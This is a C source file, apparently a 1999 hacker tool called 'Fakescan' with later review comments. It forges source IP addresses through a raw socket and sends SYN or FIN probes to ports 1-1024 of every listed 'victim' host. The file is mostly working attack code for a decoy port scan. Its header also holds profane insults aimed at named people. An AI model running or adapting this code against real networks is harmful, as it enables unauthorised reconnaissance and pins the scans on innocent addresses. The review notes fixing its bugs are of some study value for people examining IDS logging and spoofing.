/*  Fakescan.c (c) 1999 Vortexia / Andrew Alston andrew@idle.za.org

Ok... more crap code from me... thats yes... entirely useless other than
as a proof of case.  I wrote this quickly while trying to prove the case
that logging SYN/FIN portscans by source address alone is of little value:
a half-open probe never completes a handshake, so the address a log records
for it can be forged by anyone who can write a raw socket.

What the code does: 
It reads a list of source addresses to forge from the spoof file, and for
every host in the victim file sends one SYN- or FIN-flagged probe to each of
TCP ports 1-1024, repeated once per spoofed source.
Sorry there is no dns resolve on hosts in those files, it was a quick job
while I was bored and I found better things to do while coding it so
I didnt get around to adding it.
 
The code is once again written for BSD and compiles with no warnings under
fbsd 3.2 - I hate linux - Dont expect a linux port from me, someone else -
feel free to make one

If you wanna use my code, as always, feel free but I expect credit
where credit is due, I.E you use my code, you put my name in your code.

Greets and Shoutouts..

Mithrandi - Thanks for your help
Ultima - For everything you've helped me with in the past
Van - What can I say, HI
TimeWiz - Thanks for help in times past, and for ideas for upcoming projects
Sniper - My partner in crime - You have and always will rock
Opium - HI
Hotmetal - A general greet
DrSmoke - HI
jus - My social engineering partner - lets continue to mindfuck together
OPCODE - Thanks for the help - you rock
gr1p and all the people at b4b0 - Keep rocking guys
To all the people at Forbidden knowledge - Good going - Keep it up
To everyone else on all the networks and channels I hang on,
a general greet and thanks - I couldnt keep doing what I do without you guys.

Fuckoffs, Curses and the likes:

To Sunflower - If you cant handle an insult in a piece of code - and think
		thats worth of an akill - GROW UP AND GO FUCK YOURSELF
To Gaspode - May you die a slow and painful death, and may the fleas of
		10000 camels infest your armpits
To the person who said coding stuff like this was for script kiddies - 
		GET A CLUE you know who you are
To anyone else I dont like - FUCK YOU
To anyone else who doesnt like me - FUCK YOU
*/

#define __FAVOR_BSD
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* One node of the singly linked list of scan targets built from the
   victim file.  main() copies `victim` into ip_dst of every packet
   sent to that host. */
struct viclist
{
  struct in_addr victim;   /* destination address of the probes */
  struct viclist *link;    /* next target, or the list terminator */
};

/* One node of the singly linked list of forged source addresses built
   from the spoof file.  main() copies `spoof` into ip_src (and into the
   sockaddr handed to sendto) for each burst of probes. */
struct slist
{
  struct in_addr spoof;    /* source address written into the IP header */
  struct slist *link;      /* next spoofed source, or the list terminator */
};

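/* Release every node of a spoof-address list.  free(NULL) is a no-op, so
   an empty list is fine. */
static void
free_spoof_list (struct slist *head)
{
  while (head != NULL)
    {
      struct slist *next = head->link;
      free (head);
      head = next;
    }
}

/* Release every node of a victim-address list. */
static void
free_victim_list (struct viclist *head)
{
  while (head != NULL)
    {
      struct viclist *next = head->link;
      free (head);
      head = next;
    }
}

/* Parse one line as read by fgets() into an IPv4 address.  The trailing
   newline is stripped first so the check does not depend on inet_aton()
   tolerating it.  There is no DNS resolution, only dotted-quad input.
   Returns 1 on success, 0 if the line is not a valid address. */
static int
parse_addr_line (char *line, struct in_addr *out)
{
  line[strcspn (line, "\r\n")] = '\0';
  return inet_aton (line, out) != 0;
}

/* Read the spoof file (one address per line) into a NULL-terminated list
   in file order.  Unparseable lines are reported and skipped.
   Returns 0 on success.  On fopen()/malloc() failure the error is reported
   with perror(), whatever was built is freed, *head is set to NULL and -1
   is returned. */
static int
load_spoof_list (const char *path, struct slist **head)
{
  FILE *fp;
  struct slist *tail = NULL;
  char line[256];

  *head = NULL;
  if ((fp = fopen (path, "r")) == NULL)
    {
      perror (path);
      return -1;
    }

  while (fgets (line, sizeof line, fp) != NULL)
    {
      struct in_addr addr;
      struct slist *node;

      if (!parse_addr_line (line, &addr))
        {
          /* The original printed "victim file" here as well; that was a
             copy-paste slip, this loop reads the spoof file. */
          printf ("Invalid address found in spoof file.. ignoring\n");
          continue;
        }
      if ((node = malloc (sizeof *node)) == NULL)
        {
          perror ("malloc");
          fclose (fp);
          free_spoof_list (*head);
          *head = NULL;
          return -1;
        }
      node->spoof = addr;
      node->link = NULL;
      if (tail == NULL)
        *head = node;
      else
        tail->link = node;
      tail = node;
    }
  fclose (fp);
  return 0;
}

/* Read the victim file into a NULL-terminated list; same contract as
   load_spoof_list(). */
static int
load_victim_list (const char *path, struct viclist **head)
{
  FILE *fp;
  struct viclist *tail = NULL;
  char line[256];

  *head = NULL;
  if ((fp = fopen (path, "r")) == NULL)
    {
      perror (path);
      return -1;
    }

  while (fgets (line, sizeof line, fp) != NULL)
    {
      struct in_addr addr;
      struct viclist *node;

      if (!parse_addr_line (line, &addr))
        {
          printf ("Invalid address found in victim file.. ignoring\n");
          continue;
        }
      if ((node = malloc (sizeof *node)) == NULL)
        {
          perror ("malloc");
          fclose (fp);
          free_victim_list (*head);
          *head = NULL;
          return -1;
        }
      node->victim = addr;
      node->link = NULL;
      if (tail == NULL)
        *head = node;
      else
        tail->link = node;
      tail = node;
    }
  fclose (fp);
  return 0;
}

/* Usage: fakescan S|F spoof_file victim_file
   Sends a SYN- or FIN-flagged TCP segment to ports 1..1024 of every host in
   victim_file, once per source address in spoof_file, with the source
   address forged through a raw IP socket (IP_HDRINCL).  Sleeps one second
   per victim and one more per spoofed source, as the original did.
   Exit status is 0 when every sendto() succeeded, non-zero otherwise.

   Defects fixed relative to the 1999 listing: the usage string ran across
   a line break (not valid C), `tcp->th_sport` referenced an undeclared
   variable, fopen() results were compared against 0 as an integer, malloc()
   was never checked, th_off was set to 0x50 (truncated to 0 by the 4-bit
   field), srand() was re-seeded inside the per-port loop so every packet
   carried the same seq/ack, sockaddr and list memory were never
   initialised/freed, and sendto() errors were ignored. */
int
main (int argc, char *argv[])
{
  int sock;
  int on = 1;
  int failed = 0;
  char type;
  struct sockaddr_in sockstruct;
  struct ip *iphead;
  struct tcphdr *tcphead;
  struct viclist *vfirst, *vcur;
  struct slist *sfirst, *scur;
  /* IP header immediately followed by the TCP header.  Both are 20 bytes
     and 4-byte aligned, so there is no padding and sizeof is the wire
     length; using a struct instead of a char[] also keeps the header
     pointers properly aligned. */
  struct
  {
    struct ip ip;
    struct tcphdr tcp;
  } evilpacket;

  if (argc < 4)
    {
      printf ("Usage: %s scan_type ((S)yn/(F)in) spoof_file victim_file\n"
              "Example: %s S spooffile victimfile\n", argv[0], argv[0]);
      exit (EXIT_FAILURE);
    }

  /* Only the first character is significant, as with the original strncmp. */
  type = argv[1][0];
  if (type != 'S' && type != 'F')
    {
      printf ("Scan type not specified\n");
      exit (EXIT_FAILURE);
    }

  if (load_spoof_list (argv[2], &sfirst) < 0)
    exit (EXIT_FAILURE);
  for (scur = sfirst; scur != NULL; scur = scur->link)
    printf ("Found spoof host: %s\n", inet_ntoa (scur->spoof));

  if (load_victim_list (argv[3], &vfirst) < 0)
    {
      free_spoof_list (sfirst);
      exit (EXIT_FAILURE);
    }
  for (vcur = vfirst; vcur != NULL; vcur = vcur->link)
    printf ("Found victim host: %s\n", inet_ntoa (vcur->victim));

  if (sfirst == NULL || vfirst == NULL)
    {
      fprintf (stderr, "Nothing to do: spoof or victim list is empty\n");
      free_victim_list (vfirst);
      free_spoof_list (sfirst);
      exit (EXIT_FAILURE);
    }

  /* Raw IP socket with IP_HDRINCL: this program builds the IP header
     itself, which is what makes the forged source address possible.
     Opening it normally requires root (CAP_NET_RAW on Linux); expect
     socket() to fail with EPERM otherwise. */
  if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
      perror ("socket");
      free_victim_list (vfirst);
      free_spoof_list (sfirst);
      exit (EXIT_FAILURE);
    }
  if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof on) < 0)
    {
      perror ("setsockopt");
      close (sock);
      free_victim_list (vfirst);
      free_spoof_list (sfirst);
      exit (EXIT_FAILURE);
    }

  memset (&evilpacket, 0, sizeof evilpacket);
  memset (&sockstruct, 0, sizeof sockstruct);
  sockstruct.sin_family = AF_INET;
  iphead = &evilpacket.ip;
  tcphead = &evilpacket.tcp;

  iphead->ip_hl = sizeof (struct ip) / 4;
  iphead->ip_v = 4;
  /* Host byte order, as in the original: that is what the FreeBSD raw-IP
     path this file was written for expected.  Linux wants htons() here
     and rejects the packet with EINVAL otherwise. */
  iphead->ip_len = sizeof evilpacket;
  iphead->ip_id = htons ((uint16_t) getpid ());
  iphead->ip_ttl = 255;
  iphead->ip_p = IPPROTO_TCP;
  /* Left zero as the original did; it relies on the kernel filling in the
     IP checksum under IP_HDRINCL - confirm for the platform in use. */
  iphead->ip_sum = 0;
  iphead->ip_tos = 0;
  iphead->ip_off = 0;

  tcphead->th_win = htons (512);
  tcphead->th_flags = (type == 'S') ? TH_SYN : TH_FIN;
  /* th_off is a 4-bit field counting 32-bit words (5 for a bare header).
     The original stored 0x50, the byte encoding of 5 << 4, which the
     4-bit field truncates to 0 - an invalid data offset. */
  tcphead->th_off = sizeof (struct tcphdr) / 4;
  /* NOTE(review): th_sum is never computed, so every segment leaves with a
     TCP checksum of zero.  A receiver that validates the checksum (as TCP
     requires) would be expected to discard these segments before any
     scan detector that sits at or above the TCP layer sees them, which
     undercuts the "proof of case" in the file header.  Making that
     experiment meaningful means computing the pseudo-header checksum
     over the TCP header once the per-packet fields below are set. */
  tcphead->th_sum = 0;

  /* Seed once.  The original called srand(getpid()) inside the per-port
     loop, so rand() restarted for every packet and every probe carried
     the identical seq/ack pair. */
  srand ((unsigned) time (NULL) ^ (unsigned) getpid ());

  for (vcur = vfirst; vcur != NULL; vcur = vcur->link)
    {
      iphead->ip_dst = vcur->victim;
      sleep (1);
      for (scur = sfirst; scur != NULL; scur = scur->link)
        {
          int port;

          /* One random source port per (victim, spoofed source) burst,
             kept out of the 0..1023 range; the original drew an
             arbitrary 16-bit value that could be 0. */
          tcphead->th_sport =
            htons ((uint16_t) (1024 + rand () % (65536 - 1024)));
          sockstruct.sin_port = tcphead->th_sport;
          iphead->ip_src = scur->spoof;
          sockstruct.sin_addr = scur->spoof;
          sleep (1);

          for (port = 1; port <= 1024; port++)
            {
              tcphead->th_seq = htonl ((uint32_t) rand ());
              tcphead->th_ack = htonl ((uint32_t) rand ());
              tcphead->th_dport = htons ((uint16_t) port);
              if (sendto (sock, &evilpacket, sizeof evilpacket, 0,
                          (struct sockaddr *) &sockstruct,
                          sizeof sockstruct) < 0)
                {
                  /* Report the first failure only; a permission or
                     byte-order problem would otherwise print 1024 lines
                     per burst. */
                  if (failed++ == 0)
                    perror ("sendto");
                }
            }
        }
    }

  if (failed > 0)
    fprintf (stderr, "%d sendto() calls failed (first error shown above)\n",
             failed);

  close (sock);
  free_victim_list (vfirst);
  free_spoof_list (sfirst);
  return failed > 0 ? EXIT_FAILURE : EXIT_SUCCESS;
}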

